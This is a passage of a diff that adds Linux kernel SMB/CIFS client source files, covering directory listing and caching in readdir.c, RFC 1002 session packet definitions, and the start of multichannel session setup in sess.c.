++		const FILE_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_full(struct cifs_dirent *de,
++		const FILE_FULL_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_search(struct cifs_dirent *de,
++		const SEARCH_ID_FULL_DIR_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++	de->ino = le64_to_cpu(info->UniqueId);
++}
++
++static void cifs_fill_dirent_both(struct cifs_dirent *de,
++		const FILE_BOTH_DIRECTORY_INFO *info)
++{
++	de->name = &info->FileName[0];
++	de->namelen = le32_to_cpu(info->FileNameLength);
++	de->resume_key = info->FileIndex;
++}
++
++static void cifs_fill_dirent_std(struct cifs_dirent *de,
++		const FIND_FILE_STANDARD_INFO *info)
++{
++	de->name = &info->FileName[0];
++	/* one byte length, no endianess conversion */
++	de->namelen = info->FileNameLength;
++	de->resume_key = info->ResumeKey;
++}
++
++static int cifs_fill_dirent(struct cifs_dirent *de, const void *info,
++		u16 level, bool is_unicode)
++{
++	memset(de, 0, sizeof(*de));
++
++	switch (level) {
++	case SMB_FIND_FILE_POSIX_INFO:
++		cifs_fill_dirent_posix(de, info);
++		break;
++	case SMB_FIND_FILE_UNIX:
++		cifs_fill_dirent_unix(de, info, is_unicode);
++		break;
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		cifs_fill_dirent_dir(de, info);
++		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		cifs_fill_dirent_full(de, info);
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		cifs_fill_dirent_search(de, info);
++		break;
++	case SMB_FIND_FILE_BOTH_DIRECTORY_INFO:
++		cifs_fill_dirent_both(de, info);
++		break;
++	case SMB_FIND_FILE_INFO_STANDARD:
++		cifs_fill_dirent_std(de, info);
++		break;
++	default:
++		cifs_dbg(FYI, "Unknown findfirst level %d\n", level);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++#define UNICODE_DOT cpu_to_le16(0x2e)
++
++/* return 0 if no match and 1 for . (current directory) and 2 for .. (parent) */
++static int cifs_entry_is_dot(struct cifs_dirent *de, bool is_unicode)
++{
++	int rc = 0;
++
++	if (!de->name)
++		return 0;
++
++	if (is_unicode) {
++		__le16 *ufilename = (__le16 *)de->name;
++		if (de->namelen == 2) {
++			/* check for . */
++			if (ufilename[0] == UNICODE_DOT)
++				rc = 1;
++		} else if (de->namelen == 4) {
++			/* check for .. */
++			if (ufilename[0] == UNICODE_DOT &&
++			    ufilename[1] == UNICODE_DOT)
++				rc = 2;
++		}
++	} else /* ASCII */ {
++		if (de->namelen == 1) {
++			if (de->name[0] == '.')
++				rc = 1;
++		} else if (de->namelen == 2) {
++			if (de->name[0] == '.' && de->name[1] == '.')
++				rc = 2;
++		}
++	}
++
++	return rc;
++}
++
++/* Check if directory that we are searching has changed so we can decide
++   whether we can use the cached search results from the previous search */
++static int is_dir_changed(struct file *file)
++{
++	struct inode *inode = file_inode(file);
++	struct cifsInodeInfo *cifsInfo = CIFS_I(inode);
++
++	if (cifsInfo->time == 0)
++		return 1; /* directory was changed, perhaps due to unlink */
++	else
++		return 0;
++
++}
++
++static int cifs_save_resume_key(const char *current_entry,
++	struct cifsFileInfo *file_info)
++{
++	struct cifs_dirent de;
++	int rc;
++
++	rc = cifs_fill_dirent(&de, current_entry, file_info->srch_inf.info_level,
++			      file_info->srch_inf.unicode);
++	if (!rc) {
++		file_info->srch_inf.presume_name = de.name;
++		file_info->srch_inf.resume_name_len = de.namelen;
++		file_info->srch_inf.resume_key = de.resume_key;
++	}
++	return rc;
++}
++
++/*
++ * Find the corresponding entry in the search. Note that the SMB server returns
++ * search entries for . and .. which complicates logic here if we choose to
++ * parse for them and we do not assume that they are located in the findfirst
++ * return buffer. We start counting in the buffer with entry 2 and increment for
++ * every entry (do not increment for . or .. entry).
++ */
++static int
++find_cifs_entry(const unsigned int xid, struct cifs_tcon *tcon, loff_t pos,
++		struct file *file, const char *full_path,
++		char **current_entry, int *num_to_ret)
++{
++	__u16 search_flags;
++	int rc = 0;
++	int pos_in_buf = 0;
++	loff_t first_entry_in_buffer;
++	loff_t index_to_find = pos;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	/* check if index in the buffer */
++
++	if (!server->ops->query_dir_first || !server->ops->query_dir_next)
++		return -ENOSYS;
++
++	if ((cfile == NULL) || (current_entry == NULL) || (num_to_ret == NULL))
++		return -ENOENT;
++
++	*current_entry = NULL;
++	first_entry_in_buffer = cfile->srch_inf.index_of_last_entry -
++					cfile->srch_inf.entries_in_buffer;
++
++	/*
++	 * If first entry in buf is zero then is first buffer
++	 * in search response data which means it is likely . and ..
++	 * will be in this buffer, although some servers do not return
++	 * . and .. for the root of a drive and for those we need
++	 * to start two entries earlier.
++	 */
++
++	dump_cifs_file_struct(file, "In fce ");
++	if (((index_to_find < cfile->srch_inf.index_of_last_entry) &&
++	     is_dir_changed(file)) || (index_to_find < first_entry_in_buffer)) {
++		/* close and restart search */
++		cifs_dbg(FYI, "search backing up - close and restart search\n");
++		spin_lock(&cfile->file_info_lock);
++		if (server->ops->dir_needs_close(cfile)) {
++			cfile->invalidHandle = true;
++			spin_unlock(&cfile->file_info_lock);
++			if (server->ops->close_dir)
++				server->ops->close_dir(xid, tcon, &cfile->fid);
++		} else
++			spin_unlock(&cfile->file_info_lock);
++		if (cfile->srch_inf.ntwrk_buf_start) {
++			cifs_dbg(FYI, "freeing SMB ff cache buf on search rewind\n");
++			if (cfile->srch_inf.smallBuf)
++				cifs_small_buf_release(cfile->srch_inf.
++						ntwrk_buf_start);
++			else
++				cifs_buf_release(cfile->srch_inf.
++						ntwrk_buf_start);
++			cfile->srch_inf.ntwrk_buf_start = NULL;
++		}
++		rc = initiate_cifs_search(xid, file, full_path);
++		if (rc) {
++			cifs_dbg(FYI, "error %d reinitiating a search on rewind\n",
++				 rc);
++			return rc;
++		}
++		/* FindFirst/Next set last_entry to NULL on malformed reply */
++		if (cfile->srch_inf.last_entry)
++			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
++	}
++
++	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
++	if (backup_cred(cifs_sb))
++		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
++
++	while ((index_to_find >= cfile->srch_inf.index_of_last_entry) &&
++	       (rc == 0) && !cfile->srch_inf.endOfSearch) {
++		cifs_dbg(FYI, "calling findnext2\n");
++		rc = server->ops->query_dir_next(xid, tcon, &cfile->fid,
++						 search_flags,
++						 &cfile->srch_inf);
++		/* FindFirst/Next set last_entry to NULL on malformed reply */
++		if (cfile->srch_inf.last_entry)
++			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
++		if (rc)
++			return -ENOENT;
++	}
++	if (index_to_find < cfile->srch_inf.index_of_last_entry) {
++		/* we found the buffer that contains the entry */
++		/* scan and find it */
++		int i;
++		char *cur_ent;
++		char *end_of_smb;
++
++		if (cfile->srch_inf.ntwrk_buf_start == NULL) {
++			cifs_dbg(VFS, "ntwrk_buf_start is NULL during readdir\n");
++			return -EIO;
++		}
++
++		end_of_smb = cfile->srch_inf.ntwrk_buf_start +
++			server->ops->calc_smb_size(
++					cfile->srch_inf.ntwrk_buf_start);
++
++		cur_ent = cfile->srch_inf.srch_entries_start;
++		first_entry_in_buffer = cfile->srch_inf.index_of_last_entry
++					- cfile->srch_inf.entries_in_buffer;
++		pos_in_buf = index_to_find - first_entry_in_buffer;
++		cifs_dbg(FYI, "found entry - pos_in_buf %d\n", pos_in_buf);
++
++		for (i = 0; (i < (pos_in_buf)) && (cur_ent != NULL); i++) {
++			/* go entry by entry figuring out which is first */
++			cur_ent = nxt_dir_entry(cur_ent, end_of_smb,
++						cfile->srch_inf.info_level);
++		}
++		if ((cur_ent == NULL) && (i < pos_in_buf)) {
++			/* BB fixme - check if we should flag this error */
++			cifs_dbg(VFS, "reached end of buf searching for pos in buf %d index to find %lld rc %d\n",
++				 pos_in_buf, index_to_find, rc);
++		}
++		rc = 0;
++		*current_entry = cur_ent;
++	} else {
++		cifs_dbg(FYI, "index not in buffer - could not findnext into it\n");
++		return 0;
++	}
++
++	if (pos_in_buf >= cfile->srch_inf.entries_in_buffer) {
++		cifs_dbg(FYI, "can not return entries pos_in_buf beyond last\n");
++		*num_to_ret = 0;
++	} else
++		*num_to_ret = cfile->srch_inf.entries_in_buffer - pos_in_buf;
++
++	return rc;
++}
++
++static bool emit_cached_dirents(struct cached_dirents *cde,
++				struct dir_context *ctx)
++{
++	struct cached_dirent *dirent;
++	bool rc;
++
++	list_for_each_entry(dirent, &cde->entries, entry) {
++		/*
++		 * Skip all early entries prior to the current lseek()
++		 * position.
++		 */
++		if (ctx->pos > dirent->pos)
++			continue;
++		/*
++		 * We recorded the current ->pos value for the dirent
++		 * when we stored it in the cache.
++		 * However, this sequence of ->pos values may have holes
++		 * in it, for example dot-dirs returned from the server
++		 * are suppressed.
++		 * Handle this bu forcing ctx->pos to be the same as the
++		 * ->pos of the current dirent we emit from the cache.
++		 * This means that when we emit these entries from the cache
++		 * we now emit them with the same ->pos value as in the
++		 * initial scan.
++		 */
++		ctx->pos = dirent->pos;
++		rc = dir_emit(ctx, dirent->name, dirent->namelen,
++			      dirent->fattr.cf_uniqueid,
++			      dirent->fattr.cf_dtype);
++		if (!rc)
++			return rc;
++		ctx->pos++;
++	}
++	return true;
++}
++
++static void update_cached_dirents_count(struct cached_dirents *cde,
++					struct dir_context *ctx)
++{
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++
++	cde->pos++;
++}
++
++static void finished_cached_dirents_count(struct cached_dirents *cde,
++					struct dir_context *ctx)
++{
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++	if (ctx->pos != cde->pos)
++		return;
++
++	cde->is_valid = 1;
++}
++
++static void add_cached_dirent(struct cached_dirents *cde,
++			      struct dir_context *ctx,
++			      const char *name, int namelen,
++			      struct cifs_fattr *fattr)
++{
++	struct cached_dirent *de;
++
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++	if (ctx->pos != cde->pos) {
++		cde->is_failed = 1;
++		return;
++	}
++	de = kzalloc(sizeof(*de), GFP_ATOMIC);
++	if (de == NULL) {
++		cde->is_failed = 1;
++		return;
++	}
++	de->namelen = namelen;
++	de->name = kstrndup(name, namelen, GFP_ATOMIC);
++	if (de->name == NULL) {
++		kfree(de);
++		cde->is_failed = 1;
++		return;
++	}
++	de->pos = ctx->pos;
++
++	memcpy(&de->fattr, fattr, sizeof(struct cifs_fattr));
++
++	list_add_tail(&de->entry, &cde->entries);
++}
++
++static bool cifs_dir_emit(struct dir_context *ctx,
++			  const char *name, int namelen,
++			  struct cifs_fattr *fattr,
++			  struct cached_fid *cfid)
++{
++	bool rc;
++	ino_t ino = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
++
++	rc = dir_emit(ctx, name, namelen, ino, fattr->cf_dtype);
++	if (!rc)
++		return rc;
++
++	if (cfid) {
++		mutex_lock(&cfid->dirents.de_mutex);
++		add_cached_dirent(&cfid->dirents, ctx, name, namelen,
++				  fattr);
++		mutex_unlock(&cfid->dirents.de_mutex);
++	}
++
++	return rc;
++}
++
++static int cifs_filldir(char *find_entry, struct file *file,
++			struct dir_context *ctx,
++			char *scratch_buf, unsigned int max_len,
++			struct cached_fid *cfid)
++{
++	struct cifsFileInfo *file_info = file->private_data;
++	struct super_block *sb = file_inode(file)->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_dirent de = { NULL, };
++	struct cifs_fattr fattr;
++	struct qstr name;
++	int rc = 0;
++
++	rc = cifs_fill_dirent(&de, find_entry, file_info->srch_inf.info_level,
++			      file_info->srch_inf.unicode);
++	if (rc)
++		return rc;
++
++	if (de.namelen > max_len) {
++		cifs_dbg(VFS, "bad search response length %zd past smb end\n",
++			 de.namelen);
++		return -EINVAL;
++	}
++
++	/* skip . and .. since we added them first */
++	if (cifs_entry_is_dot(&de, file_info->srch_inf.unicode))
++		return 0;
++
++	if (file_info->srch_inf.unicode) {
++		struct nls_table *nlt = cifs_sb->local_nls;
++		int map_type;
++
++		map_type = cifs_remap(cifs_sb);
++		name.name = scratch_buf;
++		name.len =
++			cifs_from_utf16((char *)name.name, (__le16 *)de.name,
++					UNICODE_NAME_MAX,
++					min_t(size_t, de.namelen,
++					      (size_t)max_len), nlt, map_type);
++		name.len -= nls_nullsize(nlt);
++	} else {
++		name.name = de.name;
++		name.len = de.namelen;
++	}
++
++	switch (file_info->srch_inf.info_level) {
++	case SMB_FIND_FILE_POSIX_INFO:
++		cifs_posix_to_fattr(&fattr,
++				    (struct smb2_posix_info *)find_entry,
++				    cifs_sb);
++		break;
++	case SMB_FIND_FILE_UNIX:
++		cifs_unix_basic_to_fattr(&fattr,
++					 &((FILE_UNIX_INFO *)find_entry)->basic,
++					 cifs_sb);
++		if (S_ISLNK(fattr.cf_mode))
++			fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++		break;
++	case SMB_FIND_FILE_INFO_STANDARD:
++		cifs_std_info_to_fattr(&fattr,
++				       (FIND_FILE_STANDARD_INFO *)find_entry,
++				       cifs_sb);
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		cifs_fulldir_info_to_fattr(&fattr,
++					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
++					   cifs_sb);
++		break;
++	default:
++		cifs_dir_info_to_fattr(&fattr,
++				       (FILE_DIRECTORY_INFO *)find_entry,
++				       cifs_sb);
++		break;
++	}
++
++	if (de.ino && (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		fattr.cf_uniqueid = de.ino;
++	} else {
++		fattr.cf_uniqueid = iunique(sb, ROOT_I);
++		cifs_autodisable_serverino(cifs_sb);
++	}
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) &&
++	    couldbe_mf_symlink(&fattr))
++		/*
++		 * trying to get the type and mode can be slow,
++		 * so just call those regular files for now, and mark
++		 * for reval
++		 */
++		fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	cifs_prime_dcache(file_dentry(file), &name, &fattr);
++
++	return !cifs_dir_emit(ctx, name.name, name.len,
++			      &fattr, cfid);
++}
++
++
++int cifs_readdir(struct file *file, struct dir_context *ctx)
++{
++	int rc = 0;
++	unsigned int xid;
++	int i;
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cifsFile;
++	char *current_entry;
++	int num_to_fill = 0;
++	char *tmp_buf = NULL;
++	char *end_of_smb;
++	unsigned int max_len;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct cached_fid *cfid = NULL;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(file_dentry(file), page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto rddir2_exit;
++	}
++
++	if (file->private_data == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			goto cache_not_found;
++		tcon = tlink_tcon(tlink);
++	} else {
++		cifsFile = file->private_data;
++		tcon = tlink_tcon(cifsFile->tlink);
++	}
++
++	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	cifs_put_tlink(tlink);
++	if (rc)
++		goto cache_not_found;
++
++	mutex_lock(&cfid->dirents.de_mutex);
++	/*
++	 * If this was reading from the start of the directory
++	 * we need to initialize scanning and storing the
++	 * directory content.
++	 */
++	if (ctx->pos == 0 && cfid->dirents.ctx == NULL) {
++		cfid->dirents.ctx = ctx;
++		cfid->dirents.pos = 2;
++	}
++	/*
++	 * If we already have the entire directory cached then
++	 * we can just serve the cache.
++	 */
++	if (cfid->dirents.is_valid) {
++		if (!dir_emit_dots(file, ctx)) {
++			mutex_unlock(&cfid->dirents.de_mutex);
++			goto rddir2_exit;
++		}
++		emit_cached_dirents(&cfid->dirents, ctx);
++		mutex_unlock(&cfid->dirents.de_mutex);
++		goto rddir2_exit;
++	}
++	mutex_unlock(&cfid->dirents.de_mutex);
++
++	/* Drop the cache while calling initiate_cifs_search and
++	 * find_cifs_entry in case there will be reconnects during
++	 * query_directory.
++	 */
++	close_cached_dir(cfid);
++	cfid = NULL;
++
++ cache_not_found:
++	/*
++	 * Ensure FindFirst doesn't fail before doing filldir() for '.' and
++	 * '..'. Otherwise we won't be able to notify VFS in case of failure.
++	 */
++	if (file->private_data == NULL) {
++		rc = initiate_cifs_search(xid, file, full_path);
++		cifs_dbg(FYI, "initiate cifs search rc %d\n", rc);
++		if (rc)
++			goto rddir2_exit;
++	}
++
++	if (!dir_emit_dots(file, ctx))
++		goto rddir2_exit;
++
++	/* 1) If search is active,
++		is in current search buffer?
++		if it before then restart search
++		if after then keep searching till find it */
++	cifsFile = file->private_data;
++	if (cifsFile->srch_inf.endOfSearch) {
++		if (cifsFile->srch_inf.emptyDir) {
++			cifs_dbg(FYI, "End of search, empty dir\n");
++			rc = 0;
++			goto rddir2_exit;
++		}
++	} /* else {
++		cifsFile->invalidHandle = true;
++		tcon->ses->server->close(xid, tcon, &cifsFile->fid);
++	} */
++
++	tcon = tlink_tcon(cifsFile->tlink);
++	rc = find_cifs_entry(xid, tcon, ctx->pos, file, full_path,
++			     &current_entry, &num_to_fill);
++	open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	if (rc) {
++		cifs_dbg(FYI, "fce error %d\n", rc);
++		goto rddir2_exit;
++	} else if (current_entry != NULL) {
++		cifs_dbg(FYI, "entry %lld found\n", ctx->pos);
++	} else {
++		if (cfid) {
++			mutex_lock(&cfid->dirents.de_mutex);
++			finished_cached_dirents_count(&cfid->dirents, ctx);
++			mutex_unlock(&cfid->dirents.de_mutex);
++		}
++		cifs_dbg(FYI, "Could not find entry\n");
++		goto rddir2_exit;
++	}
++	cifs_dbg(FYI, "loop through %d times filling dir for net buf %p\n",
++		 num_to_fill, cifsFile->srch_inf.ntwrk_buf_start);
++	max_len = tcon->ses->server->ops->calc_smb_size(
++			cifsFile->srch_inf.ntwrk_buf_start);
++	end_of_smb = cifsFile->srch_inf.ntwrk_buf_start + max_len;
++
++	tmp_buf = kmalloc(UNICODE_NAME_MAX, GFP_KERNEL);
++	if (tmp_buf == NULL) {
++		rc = -ENOMEM;
++		goto rddir2_exit;
++	}
++
++	for (i = 0; i < num_to_fill; i++) {
++		if (current_entry == NULL) {
++			/* evaluate whether this case is an error */
++			cifs_dbg(VFS, "past SMB end,  num to fill %d i %d\n",
++				 num_to_fill, i);
++			break;
++		}
++		/*
++		 * if buggy server returns . and .. late do we want to
++		 * check for that here?
++		 */
++		*tmp_buf = 0;
++		rc = cifs_filldir(current_entry, file, ctx,
++				  tmp_buf, max_len, cfid);
++		if (rc) {
++			if (rc > 0)
++				rc = 0;
++			break;
++		}
++
++		ctx->pos++;
++		if (cfid) {
++			mutex_lock(&cfid->dirents.de_mutex);
++			update_cached_dirents_count(&cfid->dirents, ctx);
++			mutex_unlock(&cfid->dirents.de_mutex);
++		}
++
++		if (ctx->pos ==
++			cifsFile->srch_inf.index_of_last_entry) {
++			cifs_dbg(FYI, "last entry in buf at pos %lld %s\n",
++				 ctx->pos, tmp_buf);
++			cifs_save_resume_key(current_entry, cifsFile);
++			break;
++		}
++		current_entry =
++			nxt_dir_entry(current_entry, end_of_smb,
++				      cifsFile->srch_inf.info_level);
++	}
++	kfree(tmp_buf);
++
++rddir2_exit:
++	if (cfid)
++		close_cached_dir(cfid);
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/rfc1002pdu.h b/fs/smb/client/rfc1002pdu.h
+new file mode 100644
+index 0000000000000..ae1d025da294a
+--- /dev/null
++++ b/fs/smb/client/rfc1002pdu.h
+@@ -0,0 +1,61 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Protocol Data Unit definitions for RFC 1001/1002 support
++ *
++ *   Copyright (c) International Business Machines  Corp., 2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/* NB: unlike smb/cifs packets, the RFC1002 structures are big endian */
++
++	/* RFC 1002 session packet types */
++#define RFC1002_SESSION_MESSAGE 0x00
++#define RFC1002_SESSION_REQUEST  0x81
++#define RFC1002_POSITIVE_SESSION_RESPONSE 0x82
++#define RFC1002_NEGATIVE_SESSION_RESPONSE 0x83
++#define RFC1002_RETARGET_SESSION_RESPONSE 0x84
++#define RFC1002_SESSION_KEEP_ALIVE 0x85
++
++	/* RFC 1002 flags (only one defined */
++#define RFC1002_LENGTH_EXTEND 0x80 /* high order bit of length (ie +64K) */
++
++struct rfc1002_session_packet {
++	__u8	type;
++	__u8	flags;
++	__u16	length;
++	union {
++		struct {
++			__u8 called_len;
++			__u8 called_name[32];
++			__u8 scope1; /* null */
++			__u8 calling_len;
++			__u8 calling_name[32];
++			__u8 scope2; /* null */
++		} __attribute__((packed)) session_req;
++		struct {
++			__u32 retarget_ip_addr;
++			__u16 port;
++		} __attribute__((packed)) retarget_resp;
++		__u8 neg_ses_resp_error_code;
++		/* POSITIVE_SESSION_RESPONSE packet does not include trailer.
++		SESSION_KEEP_ALIVE packet also does not include a trailer.
++		Trailer for the SESSION_MESSAGE packet is SMB/CIFS header */
++	} __attribute__((packed)) trailer;
++} __attribute__((packed));
++
++/* Negative Session Response error codes */
++#define RFC1002_NOT_LISTENING_CALLED  0x80 /* not listening on called name */
++#define RFC1002_NOT_LISTENING_CALLING 0x81 /* not listening on calling name */
++#define RFC1002_NOT_PRESENT           0x82 /* called name not present */
++#define RFC1002_INSUFFICIENT_RESOURCE 0x83
++#define RFC1002_UNSPECIFIED_ERROR     0x8F
++
++/* RFC 1002 Datagram service packets are not defined here as they
++are not needed for the network filesystem client unless we plan on
++implementing broadcast resolution of the server ip address (from
++server netbios name). Currently server names are resolved only via DNS
++(tcp name) or ip address or an /etc/hosts equivalent mapping to ip address.*/
++
++#define DEFAULT_CIFS_CALLED_NAME  "*SMBSERVER      "
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+new file mode 100644
+index 0000000000000..81be17845072a
+--- /dev/null
++++ b/fs/smb/client/sess.c
+@@ -0,0 +1,1858 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   SMB/CIFS session setup handling routines
++ *
++ *   Copyright (c) International Business Machines  Corp., 2006, 2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include <linux/utsname.h>
++#include <linux/slab.h>
++#include <linux/version.h>
++#include "cifsfs.h"
++#include "cifs_spnego.h"
++#include "smb2proto.h"
++#include "fs_context.h"
++
++static int
++cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++		     struct cifs_server_iface *iface);
++
++bool
++is_server_using_iface(struct TCP_Server_Info *server,
++		      struct cifs_server_iface *iface)
++{
++	struct sockaddr_in *i4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *i6 = (struct sockaddr_in6 *)&iface->sockaddr;
++	struct sockaddr_in *s4 = (struct sockaddr_in *)&server->dstaddr;
++	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++	if (server->dstaddr.ss_family != iface->sockaddr.ss_family)
++		return false;
++	if (server->dstaddr.ss_family == AF_INET) {
++		if (s4->sin_addr.s_addr != i4->sin_addr.s_addr)
++			return false;
++	} else if (server->dstaddr.ss_family == AF_INET6) {
++		if (memcmp(&s6->sin6_addr, &i6->sin6_addr,
++			   sizeof(i6->sin6_addr)) != 0)
++			return false;
++	} else {
++		/* unknown family.. */
++		return false;
++	}
++	return true;
++}
++
++bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface)
++{
++	int i;
++
++	spin_lock(&ses->chan_lock);
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].iface == iface) {
++			spin_unlock(&ses->chan_lock);
++			return true;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	return false;
++}
++
++/* channel helper functions. assumed that chan_lock is held by caller. */
++
++unsigned int
++cifs_ses_get_chan_index(struct cifs_ses *ses,
++			struct TCP_Server_Info *server)
++{
++	unsigned int i;
++
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].server == server)
++			return i;
++	}
++
++	/* If we didn't find the channel, it is likely a bug */
++	if (server)
++		cifs_dbg(VFS, "unable to get chan index for server: 0x%llx",
++			 server->conn_id);
++	WARN_ON(1);
++	return 0;
++}
++
++void
++cifs_chan_set_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	ses->chans[chan_index].in_reconnect = true;
++}
++
++void
++cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	ses->chans[chan_index].in_reconnect = false;
++}
++
++bool
++cifs_chan_in_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return CIFS_CHAN_IN_RECONNECT(ses, chan_index);
++}
++
++void
++cifs_chan_set_need_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	set_bit(chan_index, &ses->chans_need_reconnect);
++	cifs_dbg(FYI, "Set reconnect bitmask for chan %u; now 0x%lx\n",
++		 chan_index, ses->chans_need_reconnect);
++}
++
++void
++cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	clear_bit(chan_index, &ses->chans_need_reconnect);
++	cifs_dbg(FYI, "Cleared reconnect bitmask for chan %u; now 0x%lx\n",
++		 chan_index, ses->chans_need_reconnect);
++}
++
++bool
++cifs_chan_needs_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return CIFS_CHAN_NEEDS_RECONNECT(ses, chan_index);
++}
++
++bool
++cifs_chan_is_iface_active(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return ses->chans[chan_index].iface &&
++		ses->chans[chan_index].iface->is_active;
++}
++
++/* returns number of channels added */
++int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	int old_chan_count, new_chan_count;
++	int left;
++	int rc = 0;
++	int tries = 0;
++	struct cifs_server_iface *iface = NULL, *niface = NULL;
++
++	spin_lock(&ses->chan_lock);
++
++	new_chan_count = old_chan_count = ses->chan_count;
++	left = ses->chan_max - ses->chan_count;
++
++	if (left <= 0) {
++		spin_unlock(&ses->chan_lock);
++		cifs_dbg(FYI,
++			 "ses already at max_channels (%zu), nothing to open\n",
++			 ses->chan_max);
++		return 0;
++	}
++
++	if (server->dialect < SMB30_PROT_ID) {
++		spin_unlock(&ses->chan_lock);
++		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
++		return 0;
++	}
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		ses->chan_max = 1;
++		spin_unlock(&ses->chan_lock);
++		cifs_server_dbg(VFS, "no multichannel support\n");
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	/*
++	 * Keep connecting to same, fastest, iface for all channels as
++	 * long as its RSS. Try next fastest one if not RSS or channel
++	 * creation fails.
++	 */
++	spin_lock(&ses->iface_lock);
++	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
++				 iface_head);
++	spin_unlock(&ses->iface_lock);
++
++	while (left > 0) {
++
++		tries++;
++		if (tries > 3*ses->chan_max) {
++			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
++				 left);
++			break;
++		}
++
++		spin_lock(&ses->iface_lock);
++		if (!ses->iface_count) {
++			spin_unlock(&ses->iface_lock);
++			break;
++		}
++
++		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
++				    iface_head) {
++			/* skip ifaces that are unusable */
++			if (!iface->is_active ||
++			    (is_ses_using_iface(ses, iface) &&
++			     !iface->rss_capable)) {
++				continue;
++			}
++
++			/* take ref before unlock */
++			kref_get(&iface->refcount);
++
++			spin_unlock(&ses->iface_lock);
++			rc = cifs_ses_add_channel(cifs_sb, ses, iface);
++			spin_lock(&ses->iface_lock);
++
++			if (rc) {
++				cifs_dbg(VFS, "failed to open extra channel on iface:%pIS rc=%d\n",
++					 &iface->sockaddr,
++					 rc);
++				kref_put(&iface->refcount, release_iface);
++				continue;
